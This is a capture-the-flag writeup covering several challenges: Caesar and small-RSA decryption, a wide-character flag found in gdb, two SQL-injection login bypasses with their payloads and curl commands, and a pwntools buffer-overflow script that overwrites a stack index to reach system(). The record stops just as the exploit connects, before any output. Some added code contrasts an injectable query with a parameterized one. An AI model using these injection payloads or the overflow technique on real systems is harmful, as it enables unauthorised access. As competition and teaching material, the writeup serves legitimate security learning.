This competition was held from 2021/7/10 4:00 (JST) to 2021/7/13 4:00 (JST).
We took part as a team again this time. The result was 52nd place out of 1418 teams, with 2341 points.
Below are writeups for the challenges I solved myself.
sanity-check (misc)
The flag was written in the challenge description.
flag{1_l0v3_54n17y_ch3ck_ch4ll5}
discord (misc)
Joining the Discord and looking at the topic of the #rules channel, the flag was written there.
flag{chall3n63_au7h0r5h1p_1nfl4710n}
inspect-me (web)
Looking at the HTML source, the flag was written in a comment.
<!-- flag{inspect_me_like_123} -->
flag{inspect_me_like_123}
compliant-lattice-feline (misc)
Just connect with nc.

```
$ nc mc.ax 31443
flag{n3tc4t_1s_a_pip3_t0_the_w0rld}
```
flag{n3tc4t_1s_a_pip3_t0_the_w0rld}
scissor (crypto)
You can guess it just by looking at the ciphertext, but the attached script shows that it is a Caesar cipher. Decrypt it with https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipher.
Rotation 12: surround_this_flag_with_flag_format
flag{surround_this_flag_with_flag_format}
orm-bad (web)
If you can log in with the username "admin", the flag is displayed. SQL injection. Entering the following and logging in displayed the flag.

```
Username: admin' --
Password: (empty)
```
flag{sqli_overused_again_0b4f6}
wstrings (rev)
```
$ gdb -q ./wstrings
Reading symbols from ./wstrings...(no debugging symbols found)...done.
gdb-peda$ start
[----------------------------------registers-----------------------------------]
RAX: 0x55555555481a (<main>: push rbp)
RBX: 0x0
RCX: 0x5555555548b0 (<__libc_csu_init>: push r15)
RDX: 0x7fffffffdf38 --> 0x7fffffffe27a ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffdf28 --> 0x7fffffffe260 ("/mnt/hgfs/Shared/wstrings")
RDI: 0x1
RBP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>: push r15)
RSP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>: push r15)
RIP: 0x55555555481e (<main+4>: sub rsp,0x150)
R8 : 0x7ffff7dced80 --> 0x0
R9 : 0x7ffff7dced80 --> 0x0
R10: 0x0
R11: 0x0
R12: 0x555555554710 (<_start>: xor ebp,ebp)
R13: 0x7fffffffdf20 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x555555554815 <frame_dummy+5>: jmp 0x555555554780 <register_tm_clones>
   0x55555555481a <main>: push rbp
   0x55555555481b <main+1>: mov rbp,rsp
=> 0x55555555481e <main+4>: sub rsp,0x150
   0x555555554825 <main+11>: mov rax,QWORD PTR fs:0x28
   0x55555555482e <main+20>: mov QWORD PTR [rbp-0x8],rax
   0x555555554832 <main+24>: xor eax,eax
   0x555555554834 <main+26>: lea rdi,[rip+0x185] # 0x5555555549c0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>: push r15)
0008| 0x7fffffffde48 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax)
0016| 0x7fffffffde50 --> 0x1
0024| 0x7fffffffde58 --> 0x7fffffffdf28 --> 0x7fffffffe260 ("/mnt/hgfs/Shared/wstrings")
0032| 0x7fffffffde60 --> 0x100008000
0040| 0x7fffffffde68 --> 0x55555555481a (<main>: push rbp)
0048| 0x7fffffffde70 --> 0x0
0056| 0x7fffffffde78 --> 0xdec3a62e07b837fc
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Temporary breakpoint 1, 0x000055555555481e in main ()
gdb-peda$ disas main
Dump of assembler code for function main:
   0x000055555555481a <+0>: push rbp
   0x000055555555481b <+1>: mov rbp,rsp
=> 0x000055555555481e <+4>: sub rsp,0x150
   0x0000555555554825 <+11>: mov rax,QWORD PTR fs:0x28
   0x000055555555482e <+20>: mov QWORD PTR [rbp-0x8],rax
   0x0000555555554832 <+24>: xor eax,eax
   0x0000555555554834 <+26>: lea rdi,[rip+0x185] # 0x5555555549c0
   0x000055555555483b <+33>: mov eax,0x0
   0x0000555555554840 <+38>: call 0x5555555546f0 <wprintf@plt>
   0x0000555555554845 <+43>: mov rdx,QWORD PTR [rip+0x2007e4] # 0x555555755030 <stdin@@GLIBC_2.2.5>
   0x000055555555484c <+50>: lea rax,[rbp-0x150]
   0x0000555555554853 <+57>: mov esi,0x50
   0x0000555555554858 <+62>: mov rdi,rax
   0x000055555555485b <+65>: call 0x5555555546c0 <fgetws@plt>
   0x0000555555554860 <+70>: mov rax,QWORD PTR [rip+0x2007a9] # 0x555555755010 <flag>
   0x0000555555554867 <+77>: lea rdx,[rbp-0x150]
   0x000055555555486e <+84>: mov rsi,rdx
   0x0000555555554871 <+87>: mov rdi,rax
   0x0000555555554874 <+90>: call 0x5555555546b0 <wcscmp@plt>
   0x0000555555554879 <+95>: test eax,eax
   0x000055555555487b <+97>: jne 0x555555554893 <main+121>
   0x000055555555487d <+99>: mov rax,QWORD PTR [rip+0x20079c] # 0x555555755020 <stdout@@GLIBC_2.2.5>
   0x0000555555554884 <+106>: mov rsi,rax
   0x0000555555554887 <+109>: lea rdi,[rip+0x1ea] # 0x555555554a78
   0x000055555555488e <+116>: call 0x5555555546e0 <fputws@plt>
   0x0000555555554893 <+121>: mov eax,0x0
   0x0000555555554898 <+126>: mov rcx,QWORD PTR [rbp-0x8]
   0x000055555555489c <+130>: xor rcx,QWORD PTR fs:0x28
   0x00005555555548a5 <+139>: je 0x5555555548ac <main+146>
   0x00005555555548a7 <+141>: call 0x5555555546d0 <__stack_chk_fail@plt>
   0x00005555555548ac <+146>: leave
   0x00005555555548ad <+147>: ret
End of assembler dump.
gdb-peda$ b *0x0000555555554874    ★ breakpoint on the comparison
Breakpoint 2 at 0x555555554874
gdb-peda$ c
Continuing.
Welcome to flag checker 1.0.
Give me a flag> hoge
[----------------------------------registers-----------------------------------]
RAX: 0x555555554938 --> 0x6c00000066 ('f')
RBX: 0x0
RCX: 0x1
RDX: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
RSI: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
RDI: 0x555555554938 --> 0x6c00000066 ('f')
RBP: 0x7fffffffde40 --> 0x5555555548b0 (<__libc_csu_init>: push r15)
RSP: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
RIP: 0x555555554874 (<main+90>: call 0x5555555546b0 <wcscmp@plt>)
R8 : 0x555555757aa4 --> 0x0
R9 : 0x7fffffffdb48 --> 0x7fffffffdb60 --> 0x1000
R10: 0x4
R11: 0x4
R12: 0x555555554710 (<_start>: xor ebp,ebp)
R13: 0x7fffffffdf20 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x555555554867 <main+77>: lea rdx,[rbp-0x150]
   0x55555555486e <main+84>: mov rsi,rdx
   0x555555554871 <main+87>: mov rdi,rax
=> 0x555555554874 <main+90>: call 0x5555555546b0 <wcscmp@plt>
   0x555555554879 <main+95>: test eax,eax
   0x55555555487b <main+97>: jne 0x555555554893 <main+121>
   0x55555555487d <main+99>: mov rax,QWORD PTR [rip+0x20079c] # 0x555555755020 <stdout@@GLIBC_2.2.5>
   0x555555554884 <main+106>: mov rsi,rax
Guessed arguments:
arg[0]: 0x555555554938 --> 0x6c00000066 ('f')
arg[1]: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
arg[2]: 0x7fffffffdcf0 --> 0x6f00000068 ('h')
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdcf0 --> 0x6f00000068 ('h')
0008| 0x7fffffffdcf8 --> 0x6500000067 ('g')
0016| 0x7fffffffdd00 --> 0xa ('\n')
0024| 0x7fffffffdd08 --> 0x7fffffffde48 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax)
0032| 0x7fffffffdd10 --> 0x7fffffffde80 --> 0x555555554710 (<_start>: xor ebp,ebp)
0040| 0x7fffffffdd18 --> 0x7ffff7ffe710 --> 0x7ffff7ffb000 (jg 0x7ffff7ffb047)
0048| 0x7fffffffdd20 --> 0x0
0056| 0x7fffffffdd28 --> 0x7ffff7dde39f (<_dl_lookup_symbol_x+319>: add rsp,0x30)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x0000555555554874 in main ()
gdb-peda$ x/s $rax
0x555555554938: "f"
gdb-peda$ x/100s $rax
0x555555554938: "f"
0x55555555493a: ""
0x55555555493b: ""
0x55555555493c: "l"
0x55555555493e: ""
0x55555555493f: ""
0x555555554940: "a"
0x555555554942: ""
0x555555554943: ""
0x555555554944: "g"
0x555555554946: ""
0x555555554947: ""
0x555555554948: "{"
0x55555555494a: ""
0x55555555494b: ""
0x55555555494c: "n"
0x55555555494e: ""
0x55555555494f: ""
0x555555554950: "0"
0x555555554952: ""
0x555555554953: ""
0x555555554954: "t"
0x555555554956: ""
0x555555554957: ""
0x555555554958: "_"
0x55555555495a: ""
0x55555555495b: ""
0x55555555495c: "a"
0x55555555495e: ""
0x55555555495f: ""
0x555555554960: "l"
0x555555554962: ""
0x555555554963: ""
0x555555554964: "1"
0x555555554966: ""
0x555555554967: ""
0x555555554968: "_"
0x55555555496a: ""
0x55555555496b: ""
0x55555555496c: "s"
0x55555555496e: ""
0x55555555496f: ""
0x555555554970: "t"
0x555555554972: ""
0x555555554973: ""
0x555555554974: "r"
0x555555554976: ""
0x555555554977: ""
0x555555554978: "1"
0x55555555497a: ""
0x55555555497b: ""
0x55555555497c: "n"
0x55555555497e: ""
0x55555555497f: ""
0x555555554980: "g"
0x555555554982: ""
0x555555554983: ""
0x555555554984: "s"
0x555555554986: ""
0x555555554987: ""
0x555555554988: "_"
0x55555555498a: ""
0x55555555498b: ""
0x55555555498c: "a"
0x55555555498e: ""
0x55555555498f: ""
0x555555554990: "r"
0x555555554992: ""
0x555555554993: ""
0x555555554994: "3"
0x555555554996: ""
0x555555554997: ""
0x555555554998: "_"
0x55555555499a: ""
0x55555555499b: ""
0x55555555499c: "s"
0x55555555499e: ""
0x55555555499f: ""
0x5555555549a0: "k"
0x5555555549a2: ""
0x5555555549a3: ""
0x5555555549a4: "1"
0x5555555549a6: ""
0x5555555549a7: ""
0x5555555549a8: "n"
0x5555555549aa: ""
0x5555555549ab: ""
0x5555555549ac: "n"
0x5555555549ae: ""
0x5555555549af: ""
0x5555555549b0: "y"
0x5555555549b2: ""
0x5555555549b3: ""
0x5555555549b4: "}"
0x5555555549b6: ""
0x5555555549b7: ""
0x5555555549b8: ""
0x5555555549b9: ""
0x5555555549ba: ""
0x5555555549bb: ""
```
Concatenate the characters stored from the address in register RAX onward (each one is a 4-byte wide character, which is why they are separated by empty strings in the dump).
flag{n0t_al1_str1ngs_ar3_sk1nny}
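The x/100s dump shows why a plain `strings` run misses this flag: every character is stored as a 4-byte wchar_t, so there is never a run of consecutive printable bytes. The following is an added example (my own code, not from the original writeup) that scans a byte blob for such UTF-32LE strings next to an ordinary 8-bit scan; the sample blob is constructed here and embeds the flag the way the binary's .rodata does.

```python
# Added example (not from the writeup): find wide (UTF-32LE) strings in a binary blob.
# glibc stores wchar_t as 4 bytes, so the flag in wstrings sits in .rodata as
# b'f\0\0\0l\0\0\0a\0\0\0...' and a plain 8-bit `strings` scan never sees it.
import re

PRINTABLE = set(range(0x20, 0x7f))      # printable ASCII, the usual `strings` criterion


def extract_narrow_strings(blob: bytes, min_len: int = 4) -> list[str]:
    """Plain `strings`-style scan: runs of at least min_len printable bytes."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def extract_wide_strings(blob: bytes, min_len: int = 4, width: int = 4) -> list[tuple[int, str]]:
    """Runs of printable characters stored one per `width` bytes, little-endian
    (width=4 is UTF-32LE as used for wchar_t on Linux; width=2 would be UTF-16LE).
    Returns (offset, string) pairs."""
    results: list[tuple[int, str]] = []
    chars: list[str] = []
    start = None
    i = 0
    while i <= len(blob) - width:
        unit = blob[i:i + width]
        # one printable byte followed by width-1 NUL bytes is one wide character
        if unit[0] in PRINTABLE and not any(unit[1:]):
            if start is None:
                start = i
            chars.append(chr(unit[0]))
            i += width
            continue
        if start is not None and len(chars) >= min_len:
            results.append((start, "".join(chars)))
        start, chars = None, []
        i += 1                              # not inside a run: slide one byte
    if start is not None and len(chars) >= min_len:
        results.append((start, "".join(chars)))
    return results


# Constructed sample: an ELF-like header, a few opcode bytes, the wide flag and a wide
# prompt string separated by NUL padding. The flag value is the one from the writeup.
FLAG = "flag{n0t_al1_str1ngs_ar3_sk1nny}"
BLOB = (b"\x7fELF\x02\x01\x01"
        + b"\x55\x48\x89\xe5"
        + FLAG.encode("utf-32-le")
        + b"\x00\x00\x00\x00"
        + "Give me a flag> ".encode("utf-32-le")
        + b"\xc9\xc3\x90\x90")

if __name__ == "__main__":
    print("narrow:", extract_narrow_strings(BLOB))     # finds nothing useful
    for off, s in extract_wide_strings(BLOB):
        print(f"wide @ {off:#x}: {s}")
```

GNU `strings -e L` performs the same 32-bit little-endian scan on a real binary.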
baby (crypto)
n = 228430203128652625114739053365339856393 = 12546190522253739887 * 18207136478875858439
With n factored, just decrypt as usual.

```python
from Crypto.Util.number import inverse, long_to_bytes

n = 228430203128652625114739053365339856393
e = 65537
c = 126721104148692049427127809839057445790
# the two prime factors of n
p = 12546190522253739887
q = 18207136478875858439

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print(flag)
```
flag{68ab82df34}
secure (web)
From the script, we can see that the flag is displayed once you log in.

```
$ curl -X POST -d 'username=admin&password=a' https://secure.mc.ax/login
Found. Redirecting to /?message=Incorrect%20username%20or%20password.%20Query:%20SELECT%20id%20FROM%20users%20WHERE%0A%20%20%20%20%20%20%20%20%20%20username%20=%20'admin'%20AND%0A%20%20%20%20%20%20%20%20%20%20password%20=%20'a';
```

URL-decode it.

```
/?message=Incorrect username or password. Query: SELECT id FROM users WHERE
          username = 'admin' AND
          password = 'a';
```

Now the query is known. Since the SQL statement contains newlines, a `--` comment on the username line would only cut off the rest of that line, so perform the SQL injection on the password line using a comment.

```
$ curl -X POST -d "username=admin&password=' UNION SELECT 1 --" https://secure.mc.ax/login
Found. Redirecting to /?message=flag%7B50m37h1n6_50m37h1n6_cl13n7_n07_600d%7D
```
flag{50m37h1n6_50m37h1n6_cl13n7_n07_600d}
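As an added example for orm-bad and secure (my own code, not the challenge source), the query shape leaked by secure is rebuilt in sqlite3 by string interpolation beside a parameterized version; the table, the user and the password value are constructed here. It shows why the injection has to move to the password line on the multi-line query, and that bound parameters turn both payloads into plain string comparisons.

```python
# Added example (not the challenge's source): the login query leaked by `secure`,
# rebuilt with string interpolation beside a parameterized version.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one admin row; the password value is made up here."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-secret')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Query shape from the leaked error message; user input is pasted straight in.
    Returns the matched id, None if no row matched, or 'error: ...' if SQLite rejects the SQL."""
    query = (
        "SELECT id FROM users WHERE\n"
        f"          username = '{username}' AND\n"
        f"          password = '{password}';"
    )
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Same query with bound parameters: input is data, never SQL text."""
    query = (
        "SELECT id FROM users WHERE\n"
        "          username = ? AND\n"
        "          password = ?;"
    )
    row = conn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


# The two payloads quoted in the writeup
ORM_BAD_USERNAME = "admin' --"              # comments out the rest of a one-line query
SECURE_PASSWORD = "' UNION SELECT 1 --"     # closes the quote on the last line instead

if __name__ == "__main__":
    conn = make_db()
    # On the multi-line query a comment on the username line only eats the rest of
    # that line, so "password = '';" survives and the statement no longer parses.
    print(login_vulnerable(conn, ORM_BAD_USERNAME, ""))
    # The password-line payload returns id 1 from the UNION without knowing the password.
    print(login_vulnerable(conn, "admin", SECURE_PASSWORD))
    # With placeholders both payloads are just strings that match no row.
    print(login_safe(conn, ORM_BAD_USERNAME, ""), login_safe(conn, "admin", SECURE_PASSWORD))
```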
beginner-generic-pwn-number-0 (pwn)
Use the BOF to overwrite inspirational_message_index so that it becomes -1.

```
$ file beginner-generic-pwn-number-0
beginner-generic-pwn-number-0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=954a4064a32902a83a98f211211c5eafdef2b3c0, for GNU/Linux 3.2.0, not stripped
$ gdb -q ./beginner-generic-pwn-number-0
Reading symbols from ./beginner-generic-pwn-number-0...(no debugging symbols found)...done.
gdb-peda$ start
[----------------------------------registers-----------------------------------]
RAX: 0x4011f6 (<main>: endbr64)
RBX: 0x0
RCX: 0x4012c0 (<__libc_csu_init>: endbr64)
RDX: 0x7fffffffdf08 --> 0x7fffffffe265 ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0")
RDI: 0x1
RBP: 0x4012c0 (<__libc_csu_init>: endbr64)
RSP: 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax)
RIP: 0x4011f6 (<main>: endbr64)
R8 : 0x7ffff7dced80 --> 0x0
R9 : 0x7ffff7dced80 --> 0x0
R10: 0x0
R11: 0x0
R12: 0x401110 (<_start>: endbr64)
R13: 0x7fffffffdef0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4011ec <__do_global_dtors_aux+44>: nop DWORD PTR [rax+0x0]
   0x4011f0 <frame_dummy>: endbr64
   0x4011f4 <frame_dummy+4>: jmp 0x401180 <register_tm_clones>
=> 0x4011f6 <main>: endbr64
   0x4011fa <main+4>: push rbp
   0x4011fb <main+5>: mov rbp,rsp
   0x4011fe <main+8>: sub rsp,0x30
   0x401202 <main+12>: mov edi,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax)
0008| 0x7fffffffde20 --> 0x1
0016| 0x7fffffffde28 --> 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0")
0024| 0x7fffffffde30 --> 0x100008000
0032| 0x7fffffffde38 --> 0x4011f6 (<main>: endbr64)
0040| 0x7fffffffde40 --> 0x0
0048| 0x7fffffffde48 --> 0xdf4a7506815ae20d
0056| 0x7fffffffde50 --> 0x401110 (<_start>: endbr64)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Temporary breakpoint 1, 0x00000000004011f6 in main ()
gdb-peda$ b main
Breakpoint 2 at 0x4011f6
gdb-peda$ q
ctf@ctf-virtual-machine:/mnt/hgfs/Shared$ gdb -q ./beginner-generic-pwn-number-0
Reading symbols from ./beginner-generic-pwn-number-0...(no debugging symbols found)...done.
gdb-peda$ start
[----------------------------------registers-----------------------------------]
RAX: 0x4011f6 (<main>: endbr64)
RBX: 0x0
RCX: 0x4012c0 (<__libc_csu_init>: endbr64)
RDX: 0x7fffffffdf08 --> 0x7fffffffe265 ("CLUTTER_IM_MODULE=xim")
RSI: 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0")
RDI: 0x1
RBP: 0x4012c0 (<__libc_csu_init>: endbr64)
RSP: 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax)
RIP: 0x4011f6 (<main>: endbr64)
R8 : 0x7ffff7dced80 --> 0x0
R9 : 0x7ffff7dced80 --> 0x0
R10: 0x0
R11: 0x0
R12: 0x401110 (<_start>: endbr64)
R13: 0x7fffffffdef0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4011ec <__do_global_dtors_aux+44>: nop DWORD PTR [rax+0x0]
   0x4011f0 <frame_dummy>: endbr64
   0x4011f4 <frame_dummy+4>: jmp 0x401180 <register_tm_clones>
=> 0x4011f6 <main>: endbr64
   0x4011fa <main+4>: push rbp
   0x4011fb <main+5>: mov rbp,rsp
   0x4011fe <main+8>: sub rsp,0x30
   0x401202 <main+12>: mov edi,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde18 --> 0x7ffff7a03bf7 (<__libc_start_main+231>: mov edi,eax)
0008| 0x7fffffffde20 --> 0x1
0016| 0x7fffffffde28 --> 0x7fffffffdef8 --> 0x7fffffffe236 ("/mnt/hgfs/Shared/beginner-generic-pwn-number-0")
0024| 0x7fffffffde30 --> 0x100008000
0032| 0x7fffffffde38 --> 0x4011f6 (<main>: endbr64)
0040| 0x7fffffffde40 --> 0x0
0048| 0x7fffffffde48 --> 0x2c813c5a2d2779ff
0056| 0x7fffffffde50 --> 0x401110 (<_start>: endbr64)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Temporary breakpoint 1, 0x00000000004011f6 in main ()
gdb-peda$ disas main
Dump of assembler code for function main:
=> 0x00000000004011f6 <+0>: endbr64
   0x00000000004011fa <+4>: push rbp
   0x00000000004011fb <+5>: mov rbp,rsp
   0x00000000004011fe <+8>: sub rsp,0x30
   0x0000000000401202 <+12>: mov edi,0x0
   0x0000000000401207 <+17>: mov eax,0x0
   0x000000000040120c <+22>: call 0x4010e0 <time@plt>
   0x0000000000401211 <+27>: mov edi,eax
   0x0000000000401213 <+29>: call 0x4010d0 <srand@plt>
   0x0000000000401218 <+34>: call 0x401100 <rand@plt>
   0x000000000040121d <+39>: cdqe
   0x000000000040121f <+41>: and eax,0x1
   0x0000000000401222 <+44>: mov QWORD PTR [rbp-0x8],rax
   0x0000000000401226 <+48>: mov rax,QWORD PTR [rip+0x2e53] # 0x404080 <stdout@@GLIBC_2.2.5>
   0x000000000040122d <+55>: mov esi,0x0
   0x0000000000401232 <+60>: mov rdi,rax
   0x0000000000401235 <+63>: call 0x4010b0 <setbuf@plt>
   0x000000000040123a <+68>: mov rax,QWORD PTR [rip+0x2e4f] # 0x404090 <stdin@@GLIBC_2.2.5>
   0x0000000000401241 <+75>: mov esi,0x0
   0x0000000000401246 <+80>: mov rdi,rax
   0x0000000000401249 <+83>: call 0x4010b0 <setbuf@plt>
   0x000000000040124e <+88>: mov rax,QWORD PTR [rip+0x2e4b] # 0x4040a0 <stderr@@GLIBC_2.2.5>
   0x0000000000401255 <+95>: mov esi,0x0
   0x000000000040125a <+100>: mov rdi,rax
   0x000000000040125d <+103>: call 0x4010b0 <setbuf@plt>
   0x0000000000401262 <+108>: mov rax,QWORD PTR [rbp-0x8]
   0x0000000000401266 <+112>: lea rdx,[rax*8+0x0]
   0x000000000040126e <+120>: lea rax,[rip+0x2deb] # 0x404060 <inspirational_messages>
   0x0000000000401275 <+127>: mov rax,QWORD PTR [rdx+rax*1]
   0x0000000000401279 <+131>: mov rdi,rax
   0x000000000040127c <+134>: call 0x4010a0 <puts@plt>
   0x0000000000401281 <+139>: lea rdi,[rip+0xec8] # 0x402150
   0x0000000000401288 <+146>: call 0x4010a0 <puts@plt>
   0x000000000040128d <+151>: lea rdi,[rip+0xf1c] # 0x4021b0
   0x0000000000401294 <+158>: call 0x4010a0 <puts@plt>
   0x0000000000401299 <+163>: lea rax,[rbp-0x30]
   0x000000000040129d <+167>: mov rdi,rax
   0x00000000004012a0 <+170>: call 0x4010f0 <gets@plt>
   0x00000000004012a5 <+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff
   0x00000000004012aa <+180>: jne 0x4012b8 <main+194>
   0x00000000004012ac <+182>: lea rdi,[rip+0xf35] # 0x4021e8
   0x00000000004012b3 <+189>: call 0x4010c0 <system@plt>
   0x00000000004012b8 <+194>: mov eax,0x0
   0x00000000004012bd <+199>: leave
   0x00000000004012be <+200>: ret
End of assembler dump.
gdb-peda$ b *0x00000000004012a5
Breakpoint 2 at 0x4012a5
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ c
Continuing.
"𝘭𝘦𝘵𝘴 𝘣𝘳𝘦𝘢𝘬 𝘵𝘩𝘦 𝘵𝘳𝘢𝘥𝘪𝘵𝘪𝘰𝘯 𝘰𝘧 𝘭𝘢𝘴𝘵 𝘮𝘪𝘯𝘶𝘵𝘦 𝘤𝘩𝘢𝘭𝘭 𝘸𝘳𝘪𝘵𝘪𝘯𝘨"
rob inc has had some serious layoffs lately and i have to do all the beginner pwn all my self!
can you write me a heartfelt message to cheer me up? :(
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RBX: 0x0
RCX: 0x7ffff7dcda00 --> 0xfbad208b
RDX: 0x7ffff7dcf8d0 --> 0x0
RSI: 0x7ffff7dcda83 --> 0xdcf8d0000000000a
RDI: 0x0
RBP: 0x7fffffffde10 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RSP: 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RIP: 0x4012a5 (<main+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff)
R8 : 0x7ffff7dcf8c0 --> 0x0
R9 : 0x7ffff7fd84c0 (0x00007ffff7fd84c0)
R10: 0x3
R11: 0x246
R12: 0x401110 (<_start>: endbr64)
R13: 0x7fffffffdef0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x401299 <main+163>: lea rax,[rbp-0x30]
   0x40129d <main+167>: mov rdi,rax
   0x4012a0 <main+170>: call 0x4010f0 <gets@plt>
=> 0x4012a5 <main+175>: cmp QWORD PTR [rbp-0x8],0xffffffffffffffff
   0x4012aa <main+180>: jne 0x4012b8 <main+194>
   0x4012ac <main+182>: lea rdi,[rip+0xf35] # 0x4021e8
   0x4012b3 <main+189>: call 0x4010c0 <system@plt>
   0x4012b8 <main+194>: mov eax,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdde0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffdde8 ("ABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffddf0 ("AACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffddf8 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffde00 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffde08 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffde10 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffde18 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 2, 0x00000000004012a5 in main ()
gdb-peda$ patto bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL    ★ the string at the address in RBP
bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 48
```
Since the comparison is against the value at RBP-0x8, put 0xffffffffffffffff after 40 bytes.

```python
from pwn import *

if len(sys.argv) == 1:
    p = remote('mc.ax', 31199)
else:
    p = process('./beginner-generic-pwn-number-0')

# 40 bytes fill the buffer up to inspirational_message_index at rbp-0x8,
# then the index itself is overwritten with -1 (0xffffffffffffffff)
payload = b'A' * 40
payload += p64(0xffffffffffffffff)

for _ in range(3):
    data = p.recvline().rstrip()
    print(data)
print(payload)
p.sendline(payload)
p.interactive()
```

The result of running it is as follows.

```
[+] Opening connection to mc.ax on port 31199: Done
